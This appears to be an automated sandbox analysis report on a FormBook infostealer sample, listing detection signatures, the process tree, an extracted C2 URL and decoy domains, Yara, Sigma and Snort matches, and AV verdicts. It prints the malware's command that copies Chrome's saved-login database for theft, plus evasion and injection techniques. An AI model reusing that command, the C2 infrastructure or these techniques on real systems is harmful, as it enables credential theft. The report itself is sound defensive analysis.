Windows Analysis Report
#U0426#U0438#U0442#U0430#U0442#U0430.exe

Overview

General Information

Sample name: #U0426#U0438#U0442#U0430#U0442#U0430.exe
renamed because original name is a hash value
Original sample name: .exe
Analysis ID: 1447829
MD5: 84144b6048277290bb6eb647bbc5ad2a
SHA1: 609a26e95e4b343bfb47ab51bdd68ef9a8ef791f
SHA256: 151bfa7336a9c96e65bf8a0eeb54a3d34665e612c8c5b3a7886f16a6f58277c4
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file does not import any functions
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Browser Data Stealing
Sigma detected: Use Short Name Path in Command Line
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • #U0426#U0438#U0442#U0430#U0442#U0430.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe" MD5: 84144B6048277290BB6EB647BBC5AD2A)
    • iexplore.exe (PID: 7612 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • mstsc.exe (PID: 7840 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • cmd.exe (PID: 8064 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • firefox.exe (PID: 7748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • iexplore.exe (PID: 7324 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
          • iexplore.exe (PID: 3916 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
            • iexplore.exe (PID: 7196 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
              • ie_to_edge_stub.exe (PID: 7240 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 89CF8972D683795DAB6901BC9456675D)
              • ssvagent.exe (PID: 1060 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
            • ie_to_edge_stub.exe (PID: 7244 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 89CF8972D683795DAB6901BC9456675D)
              • msedge.exe (PID: 7332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 5780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 6008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
                • identity_helper.exe (PID: 8788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
                • identity_helper.exe (PID: 8808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
            • ssvagent.exe (PID: 7520 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
            • iexplore.exe (PID: 8640 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
            • iexplore.exe (PID: 9068 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
        • iexplore.exe (PID: 8588 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
          • iexplore.exe (PID: 8600 cmdline: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" MD5: CFE2E6942AC1B72981B3105E22D3224E)
        • msedge.exe (PID: 7520 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 9064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • WerFault.exe (PID: 7692 cmdline: C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}
Source | Rule | Description | Author | Strings
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      Source | Rule | Description | Author | Strings
      1.2.iexplore.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      1.2.iexplore.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      1.2.iexplore.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      1.2.iexplore.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      1.2.iexplore.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group

          System Summary

          Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Program Files (x86)\Internet Explorer\iexplore.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\mstsc.exe, ProcessId: 7840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N2K8UFW
          Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mstsc.exe", ParentImage: C:\Windows\SysWOW64\mstsc.exe, ParentProcessId: 7840, ParentProcessName: mstsc.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 8064, ProcessName: cmd.exe
          Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 7196, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 1060, ProcessName: ssvagent.exe
          Source: Registry Key set; Author: frack113; Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 3916, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

          Stealing of Sensitive Information

          Source: Process started; Author: Joe Security; Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\mstsc.exe", ParentImage: C:\Windows\SysWOW64\mstsc.exe, ParentProcessId: 7840, ParentProcessName: mstsc.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 8064, ProcessName: cmd.exe
          Timestamp: 05/27/24-08:44:12.485707, SID: 2031412, Source Port: 49849, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:45:34.816913, SID: 2031412, Source Port: 49855, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:45:14.403891, SID: 2031412, Source Port: 49853, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:43:11.099341, SID: 2031412, Source Port: 49846, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:44:54.353420, SID: 2031412, Source Port: 49851, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:46:38.965412, SID: 2031412, Source Port: 49860, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 05/27/24-08:45:55.375437, SID: 2031412, Source Port: 49857, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

          AV Detection

          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe; Avira: detected
          Source: http://www.venitro.com/gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR; Avira URL Cloud: Label: phishing
          Source: http://www.truedatalab.com; Avira URL Cloud: Label: malware
          Source: http://www.amiciperlacoda.com/gy14/www.beautyloungebydede.online; Avira URL Cloud: Label: phishing
          Source: http://www.mrbmed.com/gy14/; Avira URL Cloud: Label: malware
          Source: http://www.ampsportss.com/gy14/; Avira URL Cloud: Label: malware
          Source: http://www.venitro.com/gy14/; Avira URL Cloud: Label: phishing
          Source: http://www.mtdiyx.xyz/gy14/www.169cc.xyz; Avira URL Cloud: Label: phishing
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: FormBook
          Source: www.aicashu.com; Virustotal: Detection: 6%
          Source: tryscriptify.com; Virustotal: Detection: 9%
          Source: venitro.com; Virustotal: Detection: 8%
          Source: www.camelpmkrf.com; Virustotal: Detection: 8%
          Source: www.6733633.com; Virustotal: Detection: 8%
          Source: www.mosaica.online; Virustotal: Detection: 8%
          Source: www.169cc.xyz; Virustotal: Detection: 8%
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe; ReversingLabs: Detection: 55%
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe; Virustotal: Detection: 59%
          Source: Yara match; File source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample; Integrated Neural Analysis Model: Matched 92.5% probability
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_003910C5 CryptProtectData,LocalAlloc,memcpy,LocalFree,6_2_003910C5
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_0039F157 CryptMsgOpenToDecode,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,CertOpenStore,CryptMsgClose,6_2_0039F157
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00391187 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,6_2_00391187
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00391248 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,6_2_00391248
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_003912E0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_003912E0
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00378511 CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,6_2_00378511
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_004176CC CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,6_2_004176CC
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_0039E8E0 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore,6_2_0039E8E0
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_0039A940 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,6_2_0039A940
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_0039AAC0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_0039AAC0
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_00363C2A memset,CryptUIDlgViewCertificateW,GetLastError,6_2_00363C2A
          Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 6_2_0039DE70 memset,RegOpenKeyExW,RegQueryValueExW,malloc,RegQueryValueExW,wcstombs_s,malloc,wcstombs_s,CryptSignMessage,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,free,free,RegCloseKey,6_2_0039DE70

          Exploits

          Source: Yara match; File source: 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: #U0426#U0438#U0442#U0430#U0442#U0430.exe PID: 7532, type: MEMORYSTR
          Source: unknown; HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49788 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49789 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49783 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49782 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49798 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49797 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49815 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49816 version: TLS 1.2
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8610000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.CSharp.pdb& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE861C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb4M source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: #U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: firefox.pdbP source: mstsc.exe, 00000006.00000003.2058101000.0000000006BC6000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1902173709.000000679DCF3000.00000004.00000010.00020000.00000000.sdmp
